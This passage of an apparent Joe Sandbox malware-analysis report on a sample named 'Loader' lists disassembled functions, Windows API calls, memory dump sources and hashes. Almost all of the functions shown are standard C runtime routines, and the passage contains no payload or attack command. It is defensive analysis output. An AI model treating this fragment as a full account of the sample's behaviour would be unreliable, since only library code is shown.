                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                        • Instruction ID: 0d8eb9bbe4c4616553cbf8c480240afe708ab0011c406d2b99dd3c7f213571ee
                                                                                        • Opcode Fuzzy Hash: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                        • Instruction Fuzzy Hash: 03C01238A8C0108B8608AF00D841035B2B6A78B268B24B46AC80233206D620A802C68C
                                                                                        Function 011C63AC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 011C64CB
                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 011C65D6
                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 011C6744
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 1206542248-393685449
                                                                                        • Opcode ID: 7667d6d76c3a6d3428152f90d6edd85f536de97261fdde4661136c38ee2d8609
                                                                                        • Instruction ID: af93c17c54d85a508c88a5df50d7989bdf6421c6ca8f1e5a9c19a7fdc4d16aac
                                                                                        • Opcode Fuzzy Hash: 7667d6d76c3a6d3428152f90d6edd85f536de97261fdde4661136c38ee2d8609
                                                                                        • Instruction Fuzzy Hash: 8AB1797190021ADFCF1DDFA8D8809AEBBB6BF24B14B14456EE8106B312D731EA51CF91
                                                                                        Function 011C4DD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4E07
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 011C4E0F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4E98
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 011C4EC3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 011C4F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 73d681002a8d5e326e43e2273668d5303b8844265cc8f0ea9160012d5f0dd64c
                                                                                        • Instruction ID: cc88a7ccb8815bbd39f18784da5762562a1b33de9aaed2d7b60ab1b8b44b8103
                                                                                        • Opcode Fuzzy Hash: 73d681002a8d5e326e43e2273668d5303b8844265cc8f0ea9160012d5f0dd64c
                                                                                        • Instruction Fuzzy Hash: AC412834A08219ABCF19DF6CC850A9EBFB1EF65B28F14805DD8149B381D735A901CF91
                                                                                        Function 011CAE13 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,011CAF22,011CB787,?,00000000,00000000,00000000,?,011CB07C,00000022,FlsSetValue,011D2FBC,011D2FC4,00000000), ref: 011CAED4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3664257935-537541572
                                                                                        • Opcode ID: 11756e8f6f1a98d1783b0614dd898b430e95f62197f607460ca648d27f00447b
                                                                                        • Instruction ID: 57db459f90ba39062ca64daa7958ccdac57cfbb7214af511a6d231093acdf46c
                                                                                        • Opcode Fuzzy Hash: 11756e8f6f1a98d1783b0614dd898b430e95f62197f607460ca648d27f00447b
                                                                                        • Instruction Fuzzy Hash: 61210831A02378A7CB3F9679BC40A5B3758AF51B60B150528E915A7285F730ED00CBE0
                                                                                        Function 011C5481 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,011C5478,011C514C,011C4998), ref: 011C548F
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011C549D
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011C54B6
                                                                                        • SetLastError.KERNEL32(00000000,011C5478,011C514C,011C4998), ref: 011C5508
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: c68cdaf46b9c967cd74d574147af7e880757be51a0655e31ac75ed1a8ba01ef7
                                                                                        • Instruction ID: fbb1ced2b5c0af2547b5f1c21050560c5a97a499fff8aafd35c698233176e9b1
                                                                                        • Opcode Fuzzy Hash: c68cdaf46b9c967cd74d574147af7e880757be51a0655e31ac75ed1a8ba01ef7
                                                                                        • Instruction Fuzzy Hash: BB01F53630B712AFA6BD2678ACC496E6B56EB32D79720023DE520801D4FF116880C350
                                                                                        Function 011C56A3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,011C5654,00000000,?,011D7CF4,?,?,?,011C57F7,00000004,InitializeCriticalSectionEx,011D1C18,InitializeCriticalSectionEx), ref: 011C56B0
                                                                                        • GetLastError.KERNEL32(?,011C5654,00000000,?,011D7CF4,?,?,?,011C57F7,00000004,InitializeCriticalSectionEx,011D1C18,InitializeCriticalSectionEx,00000000,?,011C5577), ref: 011C56BA
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 011C56E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 3177248105-2084034818
                                                                                        • Opcode ID: 7de0aa3b2b63222cbbc547ef5976ccc6eb7818a943bb1d912f6753ebab6355e1
                                                                                        • Instruction ID: df81b7109bff2e44fd9a3a77e129b4e863870ddd6eb772982d439dccc477ace7
                                                                                        • Opcode Fuzzy Hash: 7de0aa3b2b63222cbbc547ef5976ccc6eb7818a943bb1d912f6753ebab6355e1
                                                                                        • Instruction Fuzzy Hash: 3AE04F30382244B7EF293AA5FC0AF593F59BB21E85F108034F90DE80D9E7B2A451DA44
                                                                                        Function 011CCACD Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleOutputCP.KERNEL32(0EF9F6A5,00000000,00000000,?), ref: 011CCB30
                                                                                          • Part of subcall function 011C9FA4: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,011CC7AB,?,00000000,-00000008), ref: 011CA005
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 011CCD82
                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 011CCDC8
                                                                                        • GetLastError.KERNEL32 ref: 011CCE6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                        • String ID:
                                                                                        • API String ID: 2112829910-0
                                                                                        • Opcode ID: ecf75a70fb061b100b86a50fd0945c1183d9010c86c47557dd9fdb34ef3850f3
                                                                                        • Instruction ID: f167a15ce8d4f0f55d66c50b01756a120afaafd67f2999be0df65fe4a025ccfe
                                                                                        • Opcode Fuzzy Hash: ecf75a70fb061b100b86a50fd0945c1183d9010c86c47557dd9fdb34ef3850f3
                                                                                        • Instruction Fuzzy Hash: 3BD18AB5D002599FCB19CFE8C880AADBBB5EF19704F18456EE519EB351D730A941CF90
                                                                                        Function 011C6154 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer
                                                                                        • String ID:
                                                                                        • API String ID: 1740715915-0
                                                                                        • Opcode ID: dc683b4f69bdf8050028d4a90735b8d43e5cbb99af17d150e0c700ef2c430ec7
                                                                                        • Instruction ID: 7192c0e73b19b813b6e149789e2c00bd5a92ede6adac74323645b8560d6d1abc
                                                                                        • Opcode Fuzzy Hash: dc683b4f69bdf8050028d4a90735b8d43e5cbb99af17d150e0c700ef2c430ec7
                                                                                        • Instruction Fuzzy Hash: 0C51B272605302EFEB2D8F58D840B6ABBB6EF74A15F14452DE90587392D731E940CB91
                                                                                        Function 011CE2A6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000), ref: 011CE2BD
                                                                                        • GetLastError.KERNEL32(?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?,?,?,011CD462,00000000), ref: 011CE2C9
                                                                                          • Part of subcall function 011CE28F: CloseHandle.KERNEL32(FFFFFFFE,011CE2D9,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?,?), ref: 011CE29F
                                                                                        • ___initconout.LIBCMT ref: 011CE2D9
                                                                                          • Part of subcall function 011CE251: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,011CE280,011CDA4D,?,?,011CCEBF,?,00000000,00000000,?), ref: 011CE264
                                                                                        • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?), ref: 011CE2EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                        • String ID:
                                                                                        • API String ID: 2744216297-0
                                                                                        • Opcode ID: a37541504d4b1b058593c525e0725fab365f6785bd40dac37d09b3bee30a2574
                                                                                        • Instruction ID: 9a9bf0633a6821740209d86e7e0cd82f726ef61f87599daeab0385c29f9eb791
                                                                                        • Opcode Fuzzy Hash: a37541504d4b1b058593c525e0725fab365f6785bd40dac37d09b3bee30a2574
                                                                                        • Instruction Fuzzy Hash: CEF01C36103169BFCF3A3FD5DC04A9A3F66FB196A1B414024FA2995124D73288A0DB90
                                                                                        Function 011C674F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,?), ref: 011C6774
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: EncodePointer
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2118026453-2084237596
                                                                                        • Opcode ID: 35c36a1d91aae3d9e545193cf34f12fdfa75cc0da8c8c0431c77cb840c4e7a2f
                                                                                        • Instruction ID: 2d1b84d92b3dfbbe4a4e668fe3160c9370e0cbc882538b259dfd90183326703a
                                                                                        • Opcode Fuzzy Hash: 35c36a1d91aae3d9e545193cf34f12fdfa75cc0da8c8c0431c77cb840c4e7a2f
                                                                                        • Instruction Fuzzy Hash: 50415971900209EFDF1ADF98C880AAEBBB5BF68704F14416DFA14A6261D335D950DB51
                                                                                        Function 004337D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-3916222277
                                                                                        • Opcode ID: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                        • Instruction ID: 0fa57810a90dcf32d4ca95e0f32b1f236f6c38084188f91b8e27ff802e92a4cc
                                                                                        • Opcode Fuzzy Hash: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                        • Instruction Fuzzy Hash: 9431B0F49142009FDB40EF68D98465ABBF4BB89304F11852EE898DB360D770A989CF86